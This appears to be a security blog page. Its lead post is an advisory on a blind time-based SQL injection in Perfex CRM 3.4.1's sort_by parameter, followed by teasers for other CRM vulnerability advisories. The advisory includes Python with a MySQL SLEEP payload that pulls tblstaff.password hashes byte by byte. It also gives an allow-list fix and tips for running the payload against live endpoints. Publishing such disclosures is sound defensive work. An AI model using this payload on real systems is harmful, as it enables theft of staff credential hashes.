Insights by Bytium Operators

Apr 18, 2026 · 5 min read

Blind SQL Injection in Perfex CRM 3.4.1

Perfex CRM 3.4.1 pastes the `sort_by` request parameter directly into an ORDER BY clause with CodeIgniter's identifier escaping disabled. Any staff account — admin flag not required, zero role permissions is enough — can exploit this blind time-based SQL injection to read the entire application database, including the bcrypt-wrapped phpass hashes in `tblstaff.password`.
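To make the summary concrete, the following is an added example written for this page, not code from Perfex CRM or from the advisory: the vulnerable ORDER BY construction next to an allow-list fix, and the binary-search loop a tester uses to pull `tblstaff.password` out one byte at a time through a time-based oracle. It assumes the target is MySQL (so `IF()`, `SLEEP()` and `ASCII(SUBSTRING())` are available), the allow-listed column names are illustrative, and the live target is replaced by a local simulation so the file runs offline; only the table and column names come from the summary above.

```python
"""Added example (not Perfex CRM or Bytium code): the vulnerable ORDER BY
construction, an allow-list fix, and the binary-search loop a tester uses to
pull tblstaff.password out through a time-based oracle. The target dialect is
assumed to be MySQL; the network oracle is replaced by a local simulation so
the file runs offline."""
import re
from typing import Callable

# Assumed allow-list of sortable columns; the real column set is not on the page.
SORT_COLUMNS = {"firstname": "firstname", "lastname": "lastname", "email": "email"}


def vulnerable_order_by(sort_by: str) -> str:
    """Vulnerable pattern: the request value lands verbatim in the clause,
    which is what order_by() with identifier escaping disabled amounts to."""
    return f"ORDER BY {sort_by}"


def safe_order_by(sort_by: str, direction: str = "asc") -> str:
    """Hardened pattern: the request value is only a key into a fixed map,
    so nothing attacker-controlled reaches the SQL text."""
    if sort_by not in SORT_COLUMNS or direction.lower() not in ("asc", "desc"):
        raise ValueError(f"rejected sort parameters: {sort_by!r}, {direction!r}")
    return f"ORDER BY {SORT_COLUMNS[sort_by]} {direction.upper()}"


def timing_payload(position: int, threshold: int, delay: int = 3) -> str:
    """Assumed MySQL probe for a sort_by value: a valid ORDER BY expression
    that delays the response only when the byte at `position` (1-based) of
    the first tblstaff.password value exceeds `threshold`."""
    return (
        "(SELECT IF(ASCII(SUBSTRING((SELECT password FROM tblstaff LIMIT 1),"
        f"{position},1))>{threshold},SLEEP({delay}),0))"
    )


def extract(oracle: Callable[[str], bool], max_length: int) -> str:
    """Recover the value one byte at a time. Each byte is found by binary
    search over 0..127 (about seven probes); extraction stops at the first
    position where MySQL's SUBSTRING returns '' (ASCII('') is 0)."""
    recovered = []
    for position in range(1, max_length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(timing_payload(position, mid)):
                lo = mid + 1  # byte > mid
            else:
                hi = mid      # byte <= mid
        if lo == 0:
            break  # past the end of the string
        recovered.append(chr(lo))
    return "".join(recovered)


# Offline stand-in for the target: evaluates the probe's IF() against a
# constructed secret and reports the delay a real server would incur.
_PROBE = re.compile(r"LIMIT 1\),(\d+),1\)\)>(\d+),SLEEP\((\d+)\)")


def simulated_response_time(payload: str, secret: str) -> float:
    """Seconds the simulated server would take to answer `payload`."""
    match = _PROBE.search(payload)
    if not match:
        return 0.0
    position, threshold, delay = (int(g) for g in match.groups())
    byte = ord(secret[position - 1]) if position <= len(secret) else 0
    return float(delay) if byte > threshold else 0.0


def make_oracle(secret: str, delay: int = 3) -> Callable[[str], bool]:
    """Turn response time into the boolean the extraction loop needs; against
    a live target this is where the request would be sent and clocked."""
    return lambda payload: simulated_response_time(payload, secret) >= delay


# Constructed placeholder, not a real hash: bcrypt-shaped and of typical length.
CONSTRUCTED_SECRET = "$2y$10$CONSTRUCTEDexampleNOTarealHASHabcdefghijklmnopqrstu"


if __name__ == "__main__":
    print(vulnerable_order_by(timing_payload(1, 64)))
    print(safe_order_by("email", "desc"))
    print(extract(make_oracle(CONSTRUCTED_SECRET), 80))
```

Two practical caveats when this is run against a real endpoint rather than the simulation: an expression in ORDER BY may be evaluated once per row rather than once per query, so the observed delay can scale with the page size and should be compared against a measured baseline rather than a fixed 3 seconds; and the allow-list in `safe_order_by` is the fix that matters, since escaping an identifier that the application itself chose to leave unescaped is not something a later filter can recover.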

Apr 18, 2026 · 4 min read

Perfex CRM 3.4.1 Cross-Tenant IDOR Vulnerability

Apr 14, 2026 · 4 min read

Introducing Bytium Active: Digital Presence Health for Your Business

Bytium Active is a continuous monitoring product that watches the state of your business online — what's exposed, what's expiring, what looks broken, and what you'll need when a customer or insurer asks. Here's why we built it, what it does today, and what's coming next.

product
announcements
security
Jan 10, 2026 · 4 min read

Security Isn't a Task. It's a System

Most organizations don’t fail at security because they don’t care. They fail because security is treated as something you do, not something you run.

security
Mar 30, 2025 · 2 min read

Stored XSS in Perfex CRM 3.2.1 Contracts Module


security
advisory
Mar 30, 2025 · 2 min read

Stored Cross-Site Scripting in Perfex CRM 3.2.1 Project Discussions

Stored XSS in Perfex CRM 3.2.1 project discussions allows authenticated clients to inject JavaScript that runs for other users.

security
appsec
advisory
Mar 7, 2025 · 3 min read

Why 13,000 WordPress Sites Get Hacked Daily and How to Stop It

WordPress isn’t “insecure by default”, but outdated plugins, weak configs, and sloppy access control make it an easy target. Here’s how attacks happen and what to do.

security
Sep 18, 2024 · 2 min read

Stored XSS Vulnerabilities in CRMGo SaaS 7.2

Two stored cross-site scripting (XSS) vulnerabilities were identified in CRMGo SaaS version 7.2.

advisory
security
vulnerabilities
Sep 12, 2024 · 2 min read

Blind SQL Injection in RISE CRM (CVE-2024-8945)

Case study detailing the discovery, validation, and remediation of a blind SQL injection vulnerability in RISE CRM version 3.7.0.

Sep 8, 2024 · 2 min read

Fix VMware Workstation Host Modules on Linux Kernel (vmmon/vmnet)

How to patch and rebuild VMware Workstation host modules (vmmon/vmnet) on Debian/Ubuntu/Fedora after a kernel update breaks compilation or networking.

Technical
Page 1 of 2